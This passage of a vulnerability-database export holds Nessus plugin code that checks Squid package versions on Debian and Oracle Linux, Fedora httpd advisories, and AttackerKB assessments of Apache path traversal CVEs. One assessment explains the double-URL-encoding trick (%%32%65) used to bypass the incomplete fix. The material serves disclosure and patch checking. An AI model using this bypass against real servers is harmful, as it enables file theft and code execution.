this.\n\nCVE-2021-33620\n\nRemote servers to cause a denial of service (affecting availability to\nall clients) via an HTTP response. The issue trigger is a header that\ncan be expected to exist in HTTP traffic without any malicious intent\nby the server.\n\nFor Debian 9 stretch, these problems have been fixed in version\n3.5.23-5+deb9u7.\n\nWe recommend that you upgrade your squid3 packages.\n\nFor the detailed security status of squid3 please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/squid3\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/06/msg00014.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/squid3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/squid3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28651\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squid-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squid-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squid-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squid-purge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squid3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squidclient\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"squid\", reference:\"3.5.23-5+deb9u7\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"squid-cgi\", reference:\"3.5.23-5+deb9u7\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"squid-common\", reference:\"3.5.23-5+deb9u7\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"squid-dbg\", reference:\"3.5.23-5+deb9u7\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"squid-purge\", reference:\"3.5.23-5+deb9u7\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"squid3\", reference:\"3.5.23-5+deb9u7\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"squidclient\", reference:\"3.5.23-5+deb9u7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:55:38", "description": "The remote Oracle Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2021-9465 advisory.\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a buffer-management bug, it allows a denial of service. When resolving a request with the urn: scheme, the parser leaks a small amount of memory. However, there is an unspecified attack methodology that can easily trigger a large amount of memory consumption. (CVE-2021-28651)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a memory-management bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request processing. (CVE-2021-31806)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.\n (CVE-2021-31807)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to an input-validation bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy). A client sends an HTTP Range request to trigger this. (CVE-2021-31808)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to incorrect parser validation, it allows a Denial of Service attack against the Cache Manager API. This allows a trusted client to trigger memory leaks that. over time, lead to a Denial of Service via an unspecified short query string. This attack is limited to clients with Cache Manager API access privilege. (CVE-2021-28652)\n\n - Squid before 4.15 and 5.x before 5.0.6 allows remote servers to cause a denial of service (affecting availability to all clients) via an HTTP response. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent by the server. (CVE-2021-33620)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-09-24T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : squid (ELSA-2021-9465)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-28652", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808", "CVE-2021-33620"], "modified": "2021-09-24T00:00:00", "cpe": ["cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:squid", "p-cpe:/a:oracle:linux:squid-migration-script", "p-cpe:/a:oracle:linux:squid-sysvinit"], "id": "ORACLELINUX_ELSA-2021-9465.NASL", "href": "https://www.tenable.com/plugins/nessus/153665", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2021-9465.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153665);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/24\");\n\n script_cve_id(\n \"CVE-2021-28651\",\n \"CVE-2021-28652\",\n \"CVE-2021-31806\",\n \"CVE-2021-31807\",\n \"CVE-2021-31808\",\n \"CVE-2021-33620\"\n );\n\n script_name(english:\"Oracle Linux 7 : squid (ELSA-2021-9465)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nELSA-2021-9465 advisory.\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a buffer-management bug, it\n allows a denial of service. When resolving a request with the urn: scheme, the parser leaks a small amount\n of memory. However, there is an unspecified attack methodology that can easily trigger a large amount of\n memory consumption. (CVE-2021-28651)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a memory-management bug, it is\n vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request\n processing. (CVE-2021-31806)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a\n remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue\n trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.\n (CVE-2021-31807)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to an input-validation bug, it is\n vulnerable to a Denial of Service attack (against all clients using the proxy). A client sends an HTTP\n Range request to trigger this. (CVE-2021-31808)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to incorrect parser validation, it\n allows a Denial of Service attack against the Cache Manager API. This allows a trusted client to trigger\n memory leaks that. over time, lead to a Denial of Service via an unspecified short query string. This\n attack is limited to clients with Cache Manager API access privilege. (CVE-2021-28652)\n\n - Squid before 4.15 and 5.x before 5.0.6 allows remote servers to cause a denial of service (affecting\n availability to all clients) via an HTTP response. The issue trigger is a header that can be expected to\n exist in HTTP traffic without any malicious intent by the server. (CVE-2021-33620)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2021-9465.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected squid, squid-migration-script and / or squid-sysvinit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:squid-migration-script\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:squid-sysvinit\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar pkgs = [\n {'reference':'squid-3.5.20-17.0.1.el7_9.6', 'cpu':'aarch64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'7'},\n {'reference':'squid-3.5.20-17.0.1.el7_9.6', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'7'},\n {'reference':'squid-migration-script-3.5.20-17.0.1.el7_9.6', 'cpu':'aarch64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'7'},\n {'reference':'squid-migration-script-3.5.20-17.0.1.el7_9.6', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'7'},\n {'reference':'squid-sysvinit-3.5.20-17.0.1.el7_9.6', 'cpu':'aarch64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'7'},\n {'reference':'squid-sysvinit-3.5.20-17.0.1.el7_9.6', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'7'}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'squid / squid-migration-script / squid-sysvinit');\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-09T15:30:20", "description": "The instance of Apache HTTP Server running on the remote host is affected by a path traversal vulnerability. A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to access arbitrary files on the remote host.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-18T00:00:00", "type": "nessus", "title": "Apache HTTP Server 2.4.49 & 2.4.50 Path Traversal (CVE-2021-42013)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:apache:http_server", "cpe:/a:apache:httpd"], "id": "APACHE_2_4_50_PATH_TRAVERSAL.NBIN", "href": "https://www.tenable.com/plugins/nessus/155600", "sourceData": "Binary data apache_2_4_50_path_traversal.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2021-11-26T19:07:07", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-15T00:50:08", "type": "fedora", "title": "[SECURITY] Fedora 35 Update: httpd-2.4.51-2.fc35", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-15T00:50:08", "id": "FEDORA:00C4C3098596", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WS5RVHOIIRECG65ZBTZY7IEJVWQSQPG3/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T19:07:07", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T23:46:03", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: httpd-2.4.51-1.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-12T23:46:03", "id": "FEDORA:BDD0730B86DF", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/RMIIEFINL6FUIOPD2A3M5XC6DH45Y3CC/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-03-09T02:16:05", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \u201crequire all denied\u201d, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at October 05, 2021 3:29pm UTC reported:\n\nApache doesn\u2019t typically run with root privileges in most environments so the value of this vulnerability will largely be in using it to leak application-specific secrets such as signing keys, database connection strings, source code etc. Path traversal vulnerabilities are among the easiest to exploit and involve no type of corruption, making them very reliable and safe to use multiple times.\n\nThere will likely be evidence within the Apache access logs of exploitation. Filtering on the HTTP status code could also provide insight into what files the attacker was able to successfully leak.\n\n**noraj** at March 31, 2022 6:23pm UTC reported:\n\nApache doesn\u2019t typically run with root privileges in most environments so the value of this vulnerability will largely be in using it to leak application-specific secrets such as signing keys, database connection strings, source code etc. Path traversal vulnerabilities are among the easiest to exploit and involve no type of corruption, making them very reliable and safe to use multiple times.\n\nThere will likely be evidence within the Apache access logs of exploitation. Filtering on the HTTP status code could also provide insight into what files the attacker was able to successfully leak.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-11-03T00:00:00", "id": "AKB:4BB9D3C7-37EF-4B65-B2A8-550AFC30664C", "href": "https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-17T02:00:34", "description": "Apache HTTPd\u662fApache\u57fa\u91d1\u4f1a\u5f00\u6e90\u7684\u4e00\u6b3e\u6d41\u884c\u7684HTTP\u670d\u52a1\u5668\u3002 \n2021\u5e7410\u67088\u65e5Apache HTTPd\u5b98\u65b9\u53d1\u5e03\u5b89\u5168\u66f4\u65b0\uff0c\u62ab\u9732\u4e86CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 \u8def\u5f84\u7a7f\u8d8a\u6f0f\u6d1e\u3002\u7531\u4e8e\u5bf9CVE-2021-41773 Apache HTTPd 2.4.49 \u8def\u5f84\u7a7f\u8d8a\u6f0f\u6d1e\u7684\u4fee\u590d\u4e0d\u5b8c\u5584\uff0c\u653b\u51fb\u8005\u53ef\u6784\u9020\u6076\u610f\u8bf7\u6c42\u7ed5\u8fc7\u5e03\u4e01\uff0c\u5229\u7528\u7a7f\u8d8a\u6f0f\u6d1e\u8bfb\u53d6\u5230Web\u76ee\u5f55\u4e4b\u5916\u7684\u5176\u4ed6\u6587\u4ef6\u3002\u540c\u65f6\u82e5Apache HTTPd\u5f00\u542f\u4e86cgi\u652f\u6301\uff0c\u653b\u51fb\u8005\u53ef\u6784\u9020\u6076\u610f\u8bf7\u6c42\u6267\u884c\u547d\u4ee4\uff0c\u63a7\u5236\u670d\u52a1\u5668\u3002\u963f\u91cc\u4e91\u5e94\u6025\u54cd\u5e94\u4e2d\u5fc3\u63d0\u9192 Apache HTTPd \u7528\u6237\u5c3d\u5feb\u91c7\u53d6\u5b89\u5168\u63aa\u65bd\u963b\u6b62\u6f0f\u6d1e\u653b\u51fb\u3002\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-11T00:00:00", "type": "attackerkb", "title": "Apache HTTPd 2.4.49/2.4.50 \u8def\u5f84\u7a7f\u8d8a\u6f0f\u6d1e", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-11T00:00:00", "id": "AKB:61971866-F0B5-4317-8AF4-C4E4C23279F1", "href": "https://attackerkb.com/topics/WzgBXAx8tH/apache-httpd-2-4-49-2-4-50", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T15:17:49", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \u201crequire all denied\u201d, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n<https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html>\n\n \n**Recent assessments:** \n \n**noraj** at March 31, 2022 6:44pm UTC reported:\n\nQualys says:\n\n> CVE-2021-42013 was introduced as the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient as it did not cover double URL encoding, therefore the vulnerable configurations remained the same, but payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.\n> \n> The attack in 2.4.49 initially encoded the second dot (.) to %2e and the same was double URL encoded into %%32%65 for version 2.4.50\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 